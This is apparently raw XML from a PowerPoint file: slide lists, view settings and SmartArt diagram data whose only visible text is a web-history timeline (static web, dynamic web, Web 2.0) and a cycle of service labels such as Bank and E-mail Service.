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0" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId116"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="502" r:id="rId3"/>
    <p:sldId id="504" r:id="rId4"/>
    <p:sldId id="550" r:id="rId5"/>
    <p:sldId id="551" r:id="rId6"/>
    <p:sldId id="552" r:id="rId7"/>
    <p:sldId id="547" r:id="rId8"/>
    <p:sldId id="457" r:id="rId9"/>
    <p:sldId id="460" r:id="rId10"/>
    <p:sldId id="331" r:id="rId11"/>
    <p:sldId id="333" r:id="rId12"/>
    <p:sldId id="336" r:id="rId13"/>
    <p:sldId id="546" r:id="rId14"/>
    <p:sldId id="311" r:id="rId15"/>
    <p:sldId id="470" r:id="rId16"/>
    <p:sldId id="471" r:id="rId17"/>
    <p:sldId id="548" r:id="rId18"/>
    <p:sldId id="464" r:id="rId19"/>
    <p:sldId id="321" r:id="rId20"/>
    <p:sldId id="344" r:id="rId21"/>
    <p:sldId id="359" r:id="rId22"/>
    <p:sldId id="459" r:id="rId23"/>
    <p:sldId id="549" r:id="rId24"/>
    <p:sldId id="510" r:id="rId25"/>
    <p:sldId id="511" r:id="rId26"/>
    <p:sldId id="512" r:id="rId27"/>
    <p:sldId id="513" r:id="rId28"/>
    <p:sldId id="514" r:id="rId29"/>
    <p:sldId id="515" r:id="rId30"/>
    <p:sldId id="516" r:id="rId31"/>
    <p:sldId id="517" r:id="rId32"/>
    <p:sldId id="518" r:id="rId33"/>
    <p:sldId id="519" r:id="rId34"/>
    <p:sldId id="520" r:id="rId35"/>
    <p:sldId id="553" r:id="rId36"/>
    <p:sldId id="521" r:id="rId37"/>
    <p:sldId id="522" r:id="rId38"/>
    <p:sldId id="523" r:id="rId39"/>
    <p:sldId id="524" r:id="rId40"/>
    <p:sldId id="525" r:id="rId41"/>
    <p:sldId id="526" r:id="rId42"/>
    <p:sldId id="527" r:id="rId43"/>
    <p:sldId id="528" r:id="rId44"/>
    <p:sldId id="529" r:id="rId45"/>
    <p:sldId id="530" r:id="rId46"/>
    <p:sldId id="531" r:id="rId47"/>
    <p:sldId id="533" r:id="rId48"/>
    <p:sldId id="534" r:id="rId49"/>
    <p:sldId id="535" r:id="rId50"/>
    <p:sldId id="536" r:id="rId51"/>
    <p:sldId id="537" r:id="rId52"/>
    <p:sldId id="538" r:id="rId53"/>
    <p:sldId id="539" r:id="rId54"/>
    <p:sldId id="540" r:id="rId55"/>
    <p:sldId id="541" r:id="rId56"/>
    <p:sldId id="542" r:id="rId57"/>
    <p:sldId id="543" r:id="rId58"/>
    <p:sldId id="544" r:id="rId59"/>
    <p:sldId id="545" r:id="rId60"/>
    <p:sldId id="554" r:id="rId61"/>
    <p:sldId id="556" r:id="rId62"/>
    <p:sldId id="557" r:id="rId63"/>
    <p:sldId id="558" r:id="rId64"/>
    <p:sldId id="559" r:id="rId65"/>
    <p:sldId id="561" r:id="rId66"/>
    <p:sldId id="562" r:id="rId67"/>
    <p:sldId id="563" r:id="rId68"/>
    <p:sldId id="564" r:id="rId69"/>
    <p:sldId id="566" r:id="rId70"/>
    <p:sldId id="567" r:id="rId71"/>
    <p:sldId id="568" r:id="rId72"/>
    <p:sldId id="569" r:id="rId73"/>
    <p:sldId id="570" r:id="rId74"/>
    <p:sldId id="571" r:id="rId75"/>
    <p:sldId id="572" r:id="rId76"/>
    <p:sldId id="573" r:id="rId77"/>
    <p:sldId id="574" r:id="rId78"/>
    <p:sldId id="575" r:id="rId79"/>
    <p:sldId id="576" r:id="rId80"/>
    <p:sldId id="577" r:id="rId81"/>
    <p:sldId id="578" r:id="rId82"/>
    <p:sldId id="579" r:id="rId83"/>
    <p:sldId id="580" r:id="rId84"/>
    <p:sldId id="581" r:id="rId85"/>
    <p:sldId id="582" r:id="rId86"/>
    <p:sldId id="583" r:id="rId87"/>
    <p:sldId id="584" r:id="rId88"/>
    <p:sldId id="585" r:id="rId89"/>
    <p:sldId id="586" r:id="rId90"/>
    <p:sldId id="587" r:id="rId91"/>
    <p:sldId id="595" r:id="rId92"/>
    <p:sldId id="596" r:id="rId93"/>
    <p:sldId id="597" r:id="rId94"/>
    <p:sldId id="598" r:id="rId95"/>
    <p:sldId id="600" r:id="rId96"/>
    <p:sldId id="601" r:id="rId97"/>
    <p:sldId id="602" r:id="rId98"/>
    <p:sldId id="603" r:id="rId99"/>
    <p:sldId id="604" r:id="rId100"/>
    <p:sldId id="605" r:id="rId101"/>
    <p:sldId id="606" r:id="rId102"/>
    <p:sldId id="607" r:id="rId103"/>
    <p:sldId id="608" r:id="rId104"/>
    <p:sldId id="609" r:id="rId105"/>
    <p:sldId id="610" r:id="rId106"/>
    <p:sldId id="611" r:id="rId107"/>
    <p:sldId id="612" r:id="rId108"/>
    <p:sldId id="613" r:id="rId109"/>
    <p:sldId id="614" r:id="rId110"/>
    <p:sldId id="615" r:id="rId111"/>
    <p:sldId id="618" r:id="rId112"/>
    <p:sldId id="619" r:id="rId113"/>
    <p:sldId id="622" r:id="rId114"/>
    <p:sldId id="623" r:id="rId115"/>
  </p:sldIdLst>
  <p:sldSz cx="10150475" cy="7589838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16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32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48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64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5805" algn="l" defTabSz="914322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2965" algn="l" defTabSz="914322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126" algn="l" defTabSz="914322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287" algn="l" defTabSz="914322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08" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="67" d="100"/>
          <a:sy n="67" d="100"/>
        </p:scale>
        <p:origin x="-2088" y="-104"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2391"/>
        <p:guide pos="319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theme" Target="theme/theme1.xml"/><Relationship Id="rId121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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="printerSettings/printerSettings1.bin"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps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5FFE67-1B96-45A7-953B-007702967AEE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21117364-8CB6-4E40-B886-192B833704FA}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            <a:t>1990 Static web</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A7794216-1039-4FAC-B1A6-80FD645D87B6}" type="parTrans" cxnId="{C4104F98-B218-45E4-A6CC-B2FF6EE3FB7C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A9FE2B8-30FE-4239-8BB6-73862FFB9009}" type="sibTrans" cxnId="{C4104F98-B218-45E4-A6CC-B2FF6EE3FB7C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{466CB2C3-F140-41F9-A713-BCF3CB2F7F52}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            <a:t>2000 Web 2.0</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30D9A877-430B-47EB-8F92-21E914B49EFF}" type="parTrans" cxnId="{1E0C7C37-6F54-48A2-B3F8-8ECA6743F23B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6F3151A-E5F1-4C89-A660-C1A8495837A2}" type="sibTrans" cxnId="{1E0C7C37-6F54-48A2-B3F8-8ECA6743F23B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E48FC9B9-BEA8-43AE-9278-C5B02745A231}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            <a:t>1995 Dynamic web</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{43EC96E8-CCDC-471A-8323-4183DB691D51}" type="parTrans" cxnId="{F39385AB-2689-4B79-A11F-12ABBD76C75F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9FD9267E-ED14-4315-957D-0B1935B51CE1}" type="sibTrans" cxnId="{F39385AB-2689-4B79-A11F-12ABBD76C75F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{27784E95-5F83-4352-BCC2-22033EFBE84B}" type="pres">
      <dgm:prSet presAssocID="{2A5FFE67-1B96-45A7-953B-007702967AEE}" presName="arrowDiagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="5"/>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9A66358D-25AC-4D7B-B12A-ADFB90F2FD02}" type="pres">
      <dgm:prSet presAssocID="{2A5FFE67-1B96-45A7-953B-007702967AEE}" presName="arrow" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:lumMod val="60000"/>
            <a:lumOff val="40000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{BF439732-D87E-4A4D-8879-F64E22A61C8E}" type="pres">
      <dgm:prSet presAssocID="{2A5FFE67-1B96-45A7-953B-007702967AEE}" presName="arrowDiagram3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{31F71A96-3979-442D-9FE7-FC517511F24C}" type="pres">
      <dgm:prSet presAssocID="{21117364-8CB6-4E40-B886-192B833704FA}" presName="bullet3a" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{8B6FAFD6-6566-4CE6-BDFA-4B6DC9ECDF35}" type="pres">
      <dgm:prSet presAssocID="{21117364-8CB6-4E40-B886-192B833704FA}" presName="textBox3a" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3" custScaleX="179677" custLinFactNeighborX="25366" custLinFactNeighborY="115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4023D4-ABB1-4CD9-A621-DCA203B334ED}" type="pres">
      <dgm:prSet presAssocID="{E48FC9B9-BEA8-43AE-9278-C5B02745A231}" presName="bullet3b" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{B75BA9B9-9694-4061-893A-75591AD45CA9}" type="pres">
      <dgm:prSet presAssocID="{E48FC9B9-BEA8-43AE-9278-C5B02745A231}" presName="textBox3b" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3" custScaleX="209779" custScaleY="82645" custLinFactNeighborX="215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C3CB70-39E4-4119-A4C5-4DE11984649A}" type="pres">
      <dgm:prSet presAssocID="{466CB2C3-F140-41F9-A713-BCF3CB2F7F52}" presName="bullet3c" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{B64EA1E6-1D10-4D56-A2CB-215075EF5178}" type="pres">
      <dgm:prSet presAssocID="{466CB2C3-F140-41F9-A713-BCF3CB2F7F52}" presName="textBox3c" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3" custScaleX="188143" custScaleY="59539" custLinFactNeighborX="39639" custLinFactNeighborY="-95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9D2AAB-F1E6-4742-B1B8-A47DE1ABD4E9}" type="presOf" srcId="{21117364-8CB6-4E40-B886-192B833704FA}" destId="{8B6FAFD6-6566-4CE6-BDFA-4B6DC9ECDF35}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow2"/>
    <dgm:cxn modelId="{F39385AB-2689-4B79-A11F-12ABBD76C75F}" srcId="{2A5FFE67-1B96-45A7-953B-007702967AEE}" destId="{E48FC9B9-BEA8-43AE-9278-C5B02745A231}" srcOrd="1" destOrd="0" parTransId="{43EC96E8-CCDC-471A-8323-4183DB691D51}" sibTransId="{9FD9267E-ED14-4315-957D-0B1935B51CE1}"/>
    <dgm:cxn modelId="{1E0C7C37-6F54-48A2-B3F8-8ECA6743F23B}" srcId="{2A5FFE67-1B96-45A7-953B-007702967AEE}" destId="{466CB2C3-F140-41F9-A713-BCF3CB2F7F52}" srcOrd="2" destOrd="0" parTransId="{30D9A877-430B-47EB-8F92-21E914B49EFF}" sibTransId="{A6F3151A-E5F1-4C89-A660-C1A8495837A2}"/>
    <dgm:cxn modelId="{C4104F98-B218-45E4-A6CC-B2FF6EE3FB7C}" srcId="{2A5FFE67-1B96-45A7-953B-007702967AEE}" destId="{21117364-8CB6-4E40-B886-192B833704FA}" srcOrd="0" destOrd="0" parTransId="{A7794216-1039-4FAC-B1A6-80FD645D87B6}" sibTransId="{7A9FE2B8-30FE-4239-8BB6-73862FFB9009}"/>
    <dgm:cxn modelId="{1E6B526F-B0D4-4586-AC78-C7B0C73DE86A}" type="presOf" srcId="{E48FC9B9-BEA8-43AE-9278-C5B02745A231}" destId="{B75BA9B9-9694-4061-893A-75591AD45CA9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow2"/>
    <dgm:cxn modelId="{D3AD2FED-1FEB-4E99-A80D-529F3CEF5C13}" type="presOf" srcId="{2A5FFE67-1B96-45A7-953B-007702967AEE}" destId="{27784E95-5F83-4352-BCC2-22033EFBE84B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow2"/>
    <dgm:cxn modelId="{5D26CA71-531E-431C-8CDC-5518B40CF725}" type="presOf" srcId="{466CB2C3-F140-41F9-A713-BCF3CB2F7F52}" destId="{B64EA1E6-1D10-4D56-A2CB-215075EF5178}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow2"/>
    <dgm:cxn modelId="{7132272E-FC71-4D07-B360-990271CE535E}" type="presParOf" srcId="{27784E95-5F83-4352-BCC2-22033EFBE84B}" destId="{9A66358D-25AC-4D7B-B12A-ADFB90F2FD02}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow2"/>
    <dgm:cxn modelId="{6E7E9E4B-054B-40A0-84A1-D2B516CA393D}" type="presParOf" srcId="{27784E95-5F83-4352-BCC2-22033EFBE84B}" destId="{BF439732-D87E-4A4D-8879-F64E22A61C8E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow2"/>
    <dgm:cxn modelId="{8D7AFE9C-E470-4ACB-8777-FDCDC7DFBDF7}" type="presParOf" srcId="{BF439732-D87E-4A4D-8879-F64E22A61C8E}" destId="{31F71A96-3979-442D-9FE7-FC517511F24C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow2"/>
    <dgm:cxn modelId="{7B05CA01-711C-4DA3-87A3-EBF2DDC3AFE5}" type="presParOf" srcId="{BF439732-D87E-4A4D-8879-F64E22A61C8E}" destId="{8B6FAFD6-6566-4CE6-BDFA-4B6DC9ECDF35}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow2"/>
    <dgm:cxn modelId="{066AAC4C-53F2-4326-BC6E-7646C95CF0D4}" type="presParOf" srcId="{BF439732-D87E-4A4D-8879-F64E22A61C8E}" destId="{354023D4-ABB1-4CD9-A621-DCA203B334ED}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow2"/>
    <dgm:cxn modelId="{74206B06-429A-472C-A27F-7CE89DCA12D4}" type="presParOf" srcId="{BF439732-D87E-4A4D-8879-F64E22A61C8E}" destId="{B75BA9B9-9694-4061-893A-75591AD45CA9}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow2"/>
    <dgm:cxn modelId="{DD3B09F5-8F1A-484F-B32B-F3FAA8BAC74F}" type="presParOf" srcId="{BF439732-D87E-4A4D-8879-F64E22A61C8E}" destId="{C0C3CB70-39E4-4119-A4C5-4DE11984649A}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow2"/>
    <dgm:cxn modelId="{5B62985C-1B68-4596-8027-0E171AFA3839}" type="presParOf" srcId="{BF439732-D87E-4A4D-8879-F64E22A61C8E}" destId="{B64EA1E6-1D10-4D56-A2CB-215075EF5178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334B64-5DC1-4094-9323-9213B1877035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5F0BD2A-F4AC-4972-BD13-786F0D1662C6}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            <a:t>Bank</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95E090B9-AA0C-45FA-A7A6-39B8373A9EEC}" type="parTrans" cxnId="{ED60E5E3-7136-444B-992B-2191750C1E9C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{401A8311-920C-403D-8FAD-85DFE8938118}" type="sibTrans" cxnId="{ED60E5E3-7136-444B-992B-2191750C1E9C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A980145-927C-48E9-87E3-04C4E3188513}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            <a:t>Social Network</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC4A52FE-2772-44D1-B351-33F7F43341B5}" type="parTrans" cxnId="{8BD1C8BF-82E2-4816-997A-2F3281BD23D3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1045E30-83DB-4CAA-A297-60A982BE0415}" type="sibTrans" cxnId="{8BD1C8BF-82E2-4816-997A-2F3281BD23D3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39DBECB6-E74F-43B0-B8E6-CEC03886C649}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            <a:t>E-mail Service</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9B4F1095-A14A-492F-9494-6928CBE4CAC8}" type="parTrans" cxnId="{2082CE44-1EDC-4764-858D-6E70E9B77A3A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5BBF541A-9E86-4A62-8AD0-0F3924B96507}" type="sibTrans" cxnId="{2082CE44-1EDC-4764-858D-6E70E9B77A3A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{588210D6-3489-40AE-AF12-13D1C78E23AF}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            <a:t>Photo Editing</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1546A522-4EA1-4FED-9957-9D82FFA857D4}" type="parTrans" cxnId="{1FDC9DBA-3FE2-422E-9E26-B343D7EF249A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63D598EF-1014-4E27-835A-5A5A72CAD361}" type="sibTrans" cxnId="{1FDC9DBA-3FE2-422E-9E26-B343D7EF249A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2103F9FF-2D09-49C7-8298-9770C35EE1C2}" type="pres">
      <dgm:prSet presAssocID="{5D334B64-5DC1-4094-9323-9213B187703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B4BA7FA-0AE5-42F4-93B0-6D76E7B23C09}" type="pres">
      <dgm:prSet presAssocID="{F5F0BD2A-F4AC-4972-BD13-786F0D1662C6}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1890BCF0-1D75-4056-A1A7-901633E629AF}" type="pres">
      <dgm:prSet presAssocID="{F5F0BD2A-F4AC-4972-BD13-786F0D1662C6}" presName="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3414DF-6B2E-4079-8C03-D60C9B3C6D8B}" type="pres">
      <dgm:prSet presAssocID="{401A8311-920C-403D-8FAD-85DFE8938118}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99D2D9BC-9EC1-4FC7-84BF-78A45AC64871}" type="pres">
      <dgm:prSet presAssocID="{7A980145-927C-48E9-87E3-04C4E3188513}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{294977C9-6BB4-44FD-988E-6E7E62F0E1C5}" type="pres">
      <dgm:prSet presAssocID="{7A980145-927C-48E9-87E3-04C4E3188513}" presName="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25B8CA-852F-4373-8FA5-D76D9F3CF8C1}" type="pres">
      <dgm:prSet presAssocID="{E1045E30-83DB-4CAA-A297-60A982BE0415}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37703CA9-0AEB-4D7E-BACE-C7E277BC8DB0}" type="pres">
      <dgm:prSet presAssocID="{39DBECB6-E74F-43B0-B8E6-CEC03886C649}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EDBC8CA4-FBAF-4231-8E16-16B191E000A8}" type="pres">
      <dgm:prSet presAssocID="{39DBECB6-E74F-43B0-B8E6-CEC03886C649}" presName="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A9F65A-AB8B-4360-B29A-A7082C6B322F}" type="pres">
      <dgm:prSet presAssocID="{5BBF541A-9E86-4A62-8AD0-0F3924B96507}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BE7E73F-EEF3-4FA6-B199-07691E4F32A4}" type="pres">
      <dgm:prSet presAssocID="{588210D6-3489-40AE-AF12-13D1C78E23AF}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E9F27740-36EB-42B0-A8C6-FA20404D466F}" type="pres">
      <dgm:prSet presAssocID="{588210D6-3489-40AE-AF12-13D1C78E23AF}" presName="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D5B8FA-1214-487E-BFDB-14C0FB5E3BF1}" type="pres">
      <dgm:prSet presAssocID="{63D598EF-1014-4E27-835A-5A5A72CAD361}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4" custLinFactNeighborX="982"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{2082CE44-1EDC-4764-858D-6E70E9B77A3A}" srcId="{5D334B64-5DC1-4094-9323-9213B1877035}" destId="{39DBECB6-E74F-43B0-B8E6-CEC03886C649}" srcOrd="2" destOrd="0" parTransId="{9B4F1095-A14A-492F-9494-6928CBE4CAC8}" sibTransId="{5BBF541A-9E86-4A62-8AD0-0F3924B96507}"/>
    <dgm:cxn modelId="{1497641D-377F-40EC-AB6A-CD532B798464}" type="presOf" srcId="{588210D6-3489-40AE-AF12-13D1C78E23AF}" destId="{E9F27740-36EB-42B0-A8C6-FA20404D466F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{99BF5EEA-C5BB-4821-9C7C-91FE98F051BD}" type="presOf" srcId="{7A980145-927C-48E9-87E3-04C4E3188513}" destId="{294977C9-6BB4-44FD-988E-6E7E62F0E1C5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{FFD0D6EC-4891-4A1D-8EAD-12760D552954}" type="presOf" srcId="{39DBECB6-E74F-43B0-B8E6-CEC03886C649}" destId="{EDBC8CA4-FBAF-4231-8E16-16B191E000A8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{ED60E5E3-7136-444B-992B-2191750C1E9C}" srcId="{5D334B64-5DC1-4094-9323-9213B1877035}" destId="{F5F0BD2A-F4AC-4972-BD13-786F0D1662C6}" srcOrd="0" destOrd="0" parTransId="{95E090B9-AA0C-45FA-A7A6-39B8373A9EEC}" sibTransId="{401A8311-920C-403D-8FAD-85DFE8938118}"/>
    <dgm:cxn modelId="{6EBB3FF2-04D4-4352-9CBA-D7378F8EB7D5}" type="presOf" srcId="{5BBF541A-9E86-4A62-8AD0-0F3924B96507}" destId="{16A9F65A-AB8B-4360-B29A-A7082C6B322F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
